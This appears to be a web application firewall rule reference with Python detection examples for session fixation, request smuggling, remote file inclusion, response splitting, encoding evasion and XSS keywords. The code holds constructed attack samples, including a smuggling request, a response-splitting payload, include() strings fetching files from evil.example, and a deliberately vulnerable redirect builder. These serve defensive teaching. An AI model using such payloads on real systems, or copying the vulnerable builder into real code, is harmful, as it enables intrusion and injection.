Detects Session Fixation, an attack technique that forces a user's session ID to an explicit value. Depending on the functionality of the target website, several techniques can be utilized to "fix" the session ID value. These techniques range from Cross-site Scripting exploits to peppering the website with previously made HTTP requests. After a user's session ID has been fixed, the attacker will wait for that user to log in. Once the user does so, the attacker uses the predefined session ID value to assume the same online identity.
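The delivery pattern described above (a session id chosen by the attacker arriving in a link, or set by injected script) can be spotted in the request itself. The following is an added example and not the rule set's own logic; the list of session-cookie parameter names, the hypothetical hosts `shop.example` and `evil.example`, and the sample requests are constructed for illustration.

```python
"""Session-fixation indicators in a request URL. Added example, not part of the
rule set; the parameter names and messages below are illustrative assumptions."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names that common frameworks use for the session cookie. Assumption:
# a session id normally travels only in a cookie, so one arriving in the query
# string was chosen by whoever built the link, not by the server.
SESSION_ID_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session_id"}

# Script that assigns the session cookie directly, e.g. via a reflected XSS:
#   document.cookie="JSESSIONID=attackerchosen"
COOKIE_ASSIGN_RE = re.compile(
    r"(?i)\bdocument\s*\.\s*cookie\s*=\s*['\"]?\s*(?:"
    + "|".join(re.escape(n) for n in sorted(SESSION_ID_NAMES))
    + r")\s*="
)


def session_fixation_indicators(url: str, referer: str | None = None) -> list[str]:
    """Return human-readable indicators; empty when nothing looks like fixation."""
    parts = urlsplit(url)
    request_host = (parts.hostname or "").lower()
    findings: list[str] = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SESSION_ID_NAMES:
            findings.append(f"session id {name} supplied as a URL parameter")
            # A link carrying a fixed id that was followed from another site is
            # the classic delivery vector for this attack.
            ref_host = (urlsplit(referer).hostname or "").lower() if referer else ""
            if ref_host and ref_host != request_host:
                findings.append(f"fixed session id arrived via off-site referer {ref_host}")
        if COOKIE_ASSIGN_RE.search(value):
            findings.append(f"parameter {name} carries script that assigns a session cookie")
    return findings


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    print(session_fixation_indicators("http://shop.example/login?PHPSESSID=attackerchosen",
                                      referer="http://evil.example/promo"))
    print(session_fixation_indicators(
        'http://shop.example/search?q=<script>document.cookie="JSESSIONID=1234"</script>'))
```

The check only flags indicators; the application-side fix the description implies is to issue a fresh session id at login so that any value fixed beforehand is worthless.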

950010

LDAP Injection

Detects injection of common LDAP query constructs into request data.

950011

SSI Injection

Detects injection of common Server-Side Include (SSI) directives into request data.

950012

HTTP Request Smuggling

Detects specially crafted requests that under certain circumstances could be seen by the attacked entities as two different sets of requests. This allows certain requests to be smuggled through to a second entity without the first one realizing it.
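The disagreement between two parsers that the description refers to is usually produced by ambiguous framing headers: duplicate Content-Length values, Content-Length combined with Transfer-Encoding, or a Transfer-Encoding token obfuscated so that only one hop honours it. The code below is an added example (not the rule set's own detection) that parses a raw request head without normalising it and reports those indicators; the sample requests and the host `shop.example` are constructed.

```python
"""Request-smuggling indicator checks over a raw HTTP/1.1 request head.
Added example; the heuristics are the author's, not the rule set's."""
from __future__ import annotations

import re


def parse_head(raw: bytes) -> tuple[str, list[tuple[str, str]]]:
    """Split a raw request into its request line and (name, value) header pairs.
    Names and values are returned exactly as written, so the checks below can
    see whitespace tricks that a tolerant parser would silently normalise away."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers: list[tuple[str, str]] = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.decode("latin-1"), value.decode("latin-1")))
    return request_line, headers


def smuggling_indicators(raw: bytes) -> list[str]:
    """Return the framing ambiguities found; empty for an unambiguous request."""
    _line, headers = parse_head(raw)
    findings: list[str] = []
    content_lengths = [v.strip() for n, v in headers if n.strip().lower() == "content-length"]
    transfer_encodings = [v for n, v in headers if n.strip().lower() == "transfer-encoding"]

    # Two hops that pick different Content-Length values disagree on where the
    # first request ends, so the remainder is read as a second request.
    if len(set(content_lengths)) > 1:
        findings.append(f"conflicting Content-Length values {content_lengths}")
    # CL.TE / TE.CL: one hop frames by length, the other by chunks.
    if content_lengths and transfer_encodings:
        findings.append("Content-Length and Transfer-Encoding both present (CL.TE / TE.CL desync)")
    for name, value in headers:
        # "Transfer-Encoding : chunked" is ignored by strict parsers but honoured by lax ones.
        if name != name.strip():
            findings.append(f"whitespace around header name {name!r}")
        if "\r" in value or "\n" in value:
            findings.append(f"bare CR/LF inside header value of {name.strip()!r}")
    for value in transfer_encodings:
        token = value.strip()
        if token.lower() != "chunked":
            findings.append(f"non-standard Transfer-Encoding token {token!r}")
        elif not re.fullmatch(r" ?chunked", value, re.I):
            # A trailing space or tab is a common way to hide the token from one hop.
            findings.append(f"unusual whitespace around Transfer-Encoding value {value!r}")
    return findings


# Constructed samples, not captured traffic.
CLEAN = b"POST /x HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 5\r\n\r\nhello"
CL_TE = (b"POST /search HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
OBFUSCATED = (b"POST /search HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 4\r\n"
              b"Transfer-Encoding : chunked \r\n\r\n")
DUPLICATE_CL = (b"POST /x HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 5\r\n"
                b"Content-Length: 50\r\n\r\nhello")

if __name__ == "__main__":
    for sample in (CLEAN, CL_TE, OBFUSCATED, DUPLICATE_CL):
        print(parse_head(sample)[0], smuggling_indicators(sample))
```

Because the parser keeps raw header names and values, the same input can be fed to it from a proxy log or a packet capture; normalising first (as most HTTP libraries do) would hide exactly the discrepancies being looked for.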

950018

UPDF XSS Injection

Detects submitted links that contain a # fragment inside the query string (the Universal PDF XSS pattern).

Detects attempts to access a trojan, backdoor, or webshell web page.

950116

Unicode Encoding/Decoding Validation

Blocks full-width Unicode encoding, since a decoder that folds full-width characters back to ASCII could be used to evade other checks.

950117

URL Contains an IP Address

Detects a common RFI attack, when a URL passed in a parameter points at an IP address rather than a hostname.

950118

PHP Include() Function

Detects a common RFI attack that wraps a URL in the PHP include() function.

950119

Data Ends with Question Mark(s) (?)

Detects a common RFI attack, when data ends with question mark(s) (?).

950120

Host Doesn't Match Localhost

Detects a common RFI attack, when the host in a URL-valued parameter does not match the local host serving the request.
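The four RFI heuristics above (IP-address host, include() wrapped around a URL, trailing question marks, off-domain host) and the UPDF fragment check all operate on URL-valued request parameters, so one pass over the arguments can apply them together. The following is an added example written for this page, not the rule set's own rules: the regular expressions are the author's reading of the descriptions, the off-domain check compares against the request's own Host (taken here as the hypothetical `shop.example`), and the sample query strings are constructed.

```python
"""RFI and Universal-PDF-XSS indicators over URL-valued request parameters.
Added example; patterns are the author's interpretation of the descriptions."""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Any absolute http/ftp URL embedded in a parameter value.
URL_RE = re.compile(r"(?i)\b(?:https?|ftps?)://\S+")
# PHP include()/require() (and the _once variants) wrapped around a remote URL.
INCLUDE_RE = re.compile(r"(?i)\b(?:include|require)(?:_once)?\s*\(\s*['\"]?\s*(?:https?|ftps?)://")


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def rfi_indicators(request_host: str, query: str) -> dict[str, list[str]]:
    """Map each suspicious parameter name to the heuristics it triggered."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits: list[str] = []
        if INCLUDE_RE.search(value):
            hits.append("php include()/require() wrapped around a URL")
        for match in URL_RE.finditer(value):
            url = match.group(0)
            host = (urlsplit(url).hostname or "").lower()
            if host and is_ip_literal(host):
                hits.append(f"URL host is an IP address ({host})")
            if url.endswith("?"):
                # A trailing '?' turns whatever the application appends (e.g. '.php')
                # into a query string, so the attacker's file is fetched unchanged.
                hits.append("URL ends with question mark(s)")
            if host and host != request_host.lower():
                hits.append(f"URL points off-domain ({host} != {request_host})")
            if "#" in url:
                hits.append("URL carries a # fragment (Universal PDF XSS pattern)")
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    # Constructed query strings, not captured traffic.
    print(rfi_indicators("shop.example", "page=http://203.0.113.9/shell.txt??&ref=http://shop.example/about"))
    print(rfi_indicators("shop.example", "page=include('http://evil.example/x.txt')"))
    print(rfi_indicators("shop.example", "doc=http://shop.example/manual.pdf#javascript:alert(1)"))
```

A same-domain link such as `ref=http://shop.example/about` produces no finding, which is the false-positive case the off-domain comparison exists to avoid; a site that legitimately accepts external URLs would need an allowlist in front of these heuristics.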

950801

UTF Encoding Validation

Detects UTF encoding inconsistencies and invalid formatting.
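The two encoding rules above address different failure modes: 950801 rejects byte sequences that are not valid UTF-8 (overlong forms, truncated sequences), while 950116 catches input that is valid UTF-8 but uses full-width characters that a later normalisation step folds back to ASCII, past any check that ran on the un-normalised text. The following added example (the author's code, not the rule set's) applies both checks to a percent-encoded argument; the sample values are constructed.

```python
"""UTF-8 and full-width Unicode validation of request data. Added example;
the return structure and messages are the author's, not the rule set's."""
from __future__ import annotations

import unicodedata
from urllib.parse import unquote_to_bytes


def validate_utf8(raw: bytes) -> tuple[bool, str]:
    """Strict decode: Python's codec rejects overlong forms such as C0 AF (an
    overlong '/'), stray continuation bytes and truncated sequences."""
    try:
        return True, raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        return False, f"invalid UTF-8 at byte {exc.start}: {exc.reason}"


def fullwidth_chars(text: str) -> list[str]:
    """Characters in the Halfwidth and Fullwidth Forms block that mirror ASCII
    0x21..0x7E (U+FF01..U+FF5E), e.g. U+FF1C FULLWIDTH LESS-THAN SIGN."""
    return [c for c in text if 0xFF01 <= ord(c) <= 0xFF5E]


def check_argument(percent_encoded: str) -> dict:
    """Decode one percent-encoded value and report what a WAF would flag."""
    raw = unquote_to_bytes(percent_encoded)
    ok, detail = validate_utf8(raw)
    if not ok:
        return {"valid_utf8": False, "text": None, "fullwidth": [], "normalized": None, "reason": detail}
    fw = fullwidth_chars(detail)
    # NFKC maps each full-width form to its ASCII counterpart; an XSS check that
    # looked for '<' before this step would have missed U+FF1C.
    return {
        "valid_utf8": True,
        "text": detail,
        "fullwidth": fw,
        "normalized": unicodedata.normalize("NFKC", detail) if fw else None,
        "reason": "full-width characters fold to ASCII under NFKC; inspect the normalised form" if fw else None,
    }


if __name__ == "__main__":
    # Constructed sample values, not captured traffic.
    for sample in ("%C0%AF", "%E2%82", "%EF%BC%9Cscript%EF%BC%9E", "hello%20world"):
        print(sample, check_argument(sample))
```

Running the block shows `%EF%BC%9Cscript%EF%BC%9E` decoding to a full-width `＜script＞` whose NFKC form is `<script>`, which is why the rule blocks the full-width encoding outright rather than trusting every downstream component to normalise consistently.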

950907

OS Command Injection

Detects OS command injection, which an attacker uses to elevate privileges, execute arbitrary commands, compromise the underlying operating system and install malicious toolkits, such as agents that enlist the host in a botnet.

950910

HTTP Response Splitting

Detects Carriage Return + Line Feed (CRLF) sequences that, once reflected into a response header, could cause the receiving entity to interpret one response as two.
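The split happens when a parameter value containing CRLF is copied into a header such as Location. The added example below (the author's, not the rule set's) shows a deliberately unsafe redirect builder next to a hardened one, a naive downstream parser that counts how many responses it sees, and the corresponding check on a percent-encoded argument; the attack payload and the `/home` target are constructed.

```python
"""CRLF / HTTP response splitting: vulnerable and hardened header construction,
plus the request-side indicator. Added example, not the rule set's own code."""
from __future__ import annotations

import re
from urllib.parse import unquote

CRLF_RE = re.compile(r"[\r\n]")


def build_redirect_vulnerable(target: str) -> bytes:
    """Deliberately unsafe: the user-supplied target goes straight into the header."""
    return (b"HTTP/1.1 302 Found\r\nLocation: " + target.encode("latin-1")
            + b"\r\nContent-Length: 0\r\n\r\n")


def build_redirect_hardened(target: str) -> bytes:
    """Reject control characters before they reach the header. (Validating the
    target against an allowlist to prevent open redirects is a separate concern.)"""
    if CRLF_RE.search(target) or "\x00" in target:
        raise ValueError("control characters in header value")
    return (b"HTTP/1.1 302 Found\r\nLocation: " + target.encode("latin-1")
            + b"\r\nContent-Length: 0\r\n\r\n")


def split_response(raw: bytes) -> list[bytes]:
    """How a naive downstream parser sees the bytes: one chunk per status line."""
    return [chunk for chunk in re.split(rb"(?=HTTP/1\.[01] \d{3}\b)", raw) if chunk]


def response_splitting_indicator(arg_value: str) -> bool:
    """Request-side check: does the argument carry CR or LF once URL-decoded?
    (%0d / %0a in the raw value decode to exactly these characters.)"""
    return bool(CRLF_RE.search(unquote(arg_value)))


# Constructed payload: after the app decodes it, the value terminates the real
# response and supplies a complete second one carrying attacker-controlled HTML.
ATTACK = ("/home\r\nContent-Length: 0\r\n\r\n"
          "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
          "<script>alert(1)</script>")

if __name__ == "__main__":
    print(len(split_response(build_redirect_vulnerable(ATTACK))), "responses seen downstream")
    print(response_splitting_indicator("%2Fhome%0d%0aSet-Cookie:%20a=b"))
```

The vulnerable builder yields two responses to the parser, the second one entirely attacker-controlled, which is the cache-poisoning and XSS vector the rule is meant to catch before the value reaches the application.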

958000

Addimport XSS Attack

Detects usage of addimport in request, cookies, or arguments.

958001

document Cookie XSS Attack

Detects usage of document.cookie in request, cookies, or arguments.

958002

execscript XSS Attack

Detects usage of execscript in request, cookies, or arguments.

958003

fromcharcode XSS Attack

Detects usage of fromcharcode in request, cookies, or arguments.

958004

innerhtml XSS Attack

Detects usage of innerhtml in request, cookies, or arguments.

958005

cdata XSS Attack

Detects usage of cdata in request, cookies, or arguments.

958006

body background XSS Attack

Detects usage of <body background in request, cookies, or arguments.

958007

onload XSS Attack

Detects usage of onload in request, cookies, or arguments.

958008

input type image XSS Attack

Detects usage of <input type image in request, cookies, or arguments.

958009

import XSS Attack

Detects usage of import in request, cookies, or arguments.

958010

activexobject XSS Attack

Detects usage of activexobject in request, cookies, or arguments.

958011

background-image: XSS Attack

Detects usage of background-image: in request, cookies, or arguments.

958012

copyparentfolder XSS Attack

Detects usage of copyparentfolder in request, cookies, or arguments.

958013

createtextrange XSS Attack

Detects usage of createtextrange in request, cookies, or arguments.

958016

getparentfolder XSS Attack

Detects usage of getparentfolder in request, cookies, or arguments.

958017

getspecialfolder XSS Attack

Detects usage of getspecialfolder in request, cookies, or arguments.

958018

href javascript: XSS Attack

Detects usage of href javascript: in request, cookies, or arguments.

958019

href shell: XSS Attack

Detects usage of href shell: in request, cookies, or arguments.

958020

href vbscript: XSS Attack

Detects usage of href vbscript: in request, cookies, or arguments.

958022

livescript: XSS Attack

Detects usage of livescript: in request, cookies, or arguments.

958023

lowsrc javascript: XSS Attack

Detects usage of lowsrc javascript: in request, cookies, or arguments.
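Every rule in the 958000 to 958023 family above is a keyword match over request data, so the interesting engineering is in what happens before the match (URL and HTML-entity decoding, lowercasing, whitespace compression) and in how tightly the keyword is bounded. The following added example (the author's, not the rule set's implementation) runs the keywords listed above over constructed arguments and cookies and shows the false positive that a bare substring match produces on the word "important"; the keyword for 958019 is taken as `href shell:`, and the transformation order is an assumption.

```python
"""Keyword-based XSS indicator matching over arguments and cookies.
Added example; the keyword list is taken from the rule titles above, the
matching and transformation logic is the author's, not the rule set's."""
from __future__ import annotations

import html
import re
from urllib.parse import unquote_plus

XSS_KEYWORDS = [
    "addimport", "document.cookie", "execscript", "fromcharcode", "innerhtml",
    "cdata", "<body background", "onload", "<input type image", "import",
    "activexobject", "background-image:", "copyparentfolder", "createtextrange",
    "getparentfolder", "getspecialfolder", "href javascript:", "href shell:",
    "href vbscript:", "livescript:", "lowsrc javascript:",
]


def normalise(value: str) -> str:
    """Transformations applied before matching (assumed order): URL-decode,
    HTML-entity-decode, lowercase, collapse whitespace runs to one space."""
    decoded = html.unescape(unquote_plus(value)).lower()
    return re.sub(r"\s+", " ", decoded)


def compile_matcher(keywords: list[str], word_boundaries: bool = True) -> re.Pattern:
    """Build one alternation. With word_boundaries, a keyword that starts or ends
    with an alphanumeric character must sit on a word boundary there, so
    'import' no longer fires inside 'important'."""
    parts = []
    for kw in keywords:
        pattern = re.escape(kw)
        if word_boundaries and kw[0].isalnum():
            pattern = r"\b" + pattern
        if word_boundaries and kw[-1].isalnum():
            pattern = pattern + r"\b"
        parts.append(pattern)
    return re.compile("|".join(parts))


def scan_request(args: dict[str, str], cookies: dict[str, str],
                 matcher: re.Pattern) -> list[tuple[str, str, str]]:
    """Return (location, name, matched keyword) for every hit in ARGS and COOKIES."""
    hits: list[tuple[str, str, str]] = []
    for location, items in (("ARGS", args), ("COOKIES", cookies)):
        for name, value in items.items():
            for match in matcher.finditer(normalise(value)):
                hits.append((location, name, match.group(0)))
    return hits


STRICT = compile_matcher(XSS_KEYWORDS)
LOOSE = compile_matcher(XSS_KEYWORDS, word_boundaries=False)

if __name__ == "__main__":
    # Constructed request data, not captured traffic.
    args = {"q": "%3Cimg%20src%3Dx%20onload%3Dalert(1)%3E", "note": "This is important"}
    cookies = {"theme": "String.fromCharCode(88,83,83)"}
    print(scan_request(args, cookies, STRICT))
    print(scan_request(args, cookies, LOOSE))
    print(scan_request({"bg": "&lt;body background=&quot;javascript:alert(1)&quot;&gt;"}, {}, STRICT))
```

The strict matcher reports `onload` and `fromcharcode` and stays silent on "important"; the loose one adds a spurious `import` hit. Entity-encoded input such as `&lt;body background=...` is only caught because decoding runs before the match, which is the same reason the full-width rule above refuses input that would normalise differently across components.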